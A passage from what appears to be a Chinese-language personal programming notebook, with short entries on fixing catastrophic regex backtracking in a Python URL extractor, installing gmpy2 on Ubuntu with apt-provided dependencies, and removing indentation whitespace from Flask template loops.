    _locale._getdefaultlocale = (lambda *args: ['en_US', 'utf8'])
```

----

## Python提取url 正则匹配的回溯爆炸问题

提取url想遇到中文字符就不算入url中，写出了这样的正则(Python)，把中文加入到最后的排除字符：

```
_url_re = re.compile(r'(?im)((?:https?://|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}/)(?:[^\s()<>，。（）]+|\([^\s()<>，。（）]+\))+(?:\([^\s()<>，。（）]+\)|[^\u4e00-\u9fa5，。（）\s`!()\[\]{};:\'".,<>?]))')
```

然后实际运行的时候发现网站特定页面访问特别缓慢，CPU占用高，排除许久死循环后发现是这个正则花了太长的时间

解决方案就是放弃使用正则来剔除中文，提取出含有中文字符的url后再做处理去掉中文字符（字节数>1的）

现在使用的正则是：

```
_url_re = re.compile(r'(?im)((?:https?://|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}/)(?:[^\s()<>]+|\([^\s()<>]+\))+(?:\([^\s()<>]+\)|[^\s`!()\[\]{};:\'".,<>?]))')
```

提取后的处理代码：

```
start, end = match.span()
while len(data[end-1].encode("utf-8"))>1:
    end -= 1
```

现在改为更加保守的 从左往右遍历，遇到字节数>1的就终止url：

```
start, end = match.span()
newend = start
while newend<end and len(data[newend].encode("utf-8"))==1:
    newend += 1
end = newend
```

----

## ubuntu安装gmpy2

```
apt install libmpc-dev libmpfr-dev
pip install gmpy2
```

辣鸡的官方文档都不提一下apt安装依赖库的事情，apt能搞定的为啥还要自己编译hhh

支持python3 也可以-t .安装到当前目录，就是编译生成了一个so文件

----

## Flask模板 删去循环引入的多余空格

在模板文件中写for循环的时候，产生的html会包含代码中的缩进空格，这可能会暴露代码的信息，所以有必要删去

很简单 把 `{% %}`改为 `{%- -%}`即可

```
{%- for i in range(1,10) -%}
    {{i}}
{%- endfor -%}
```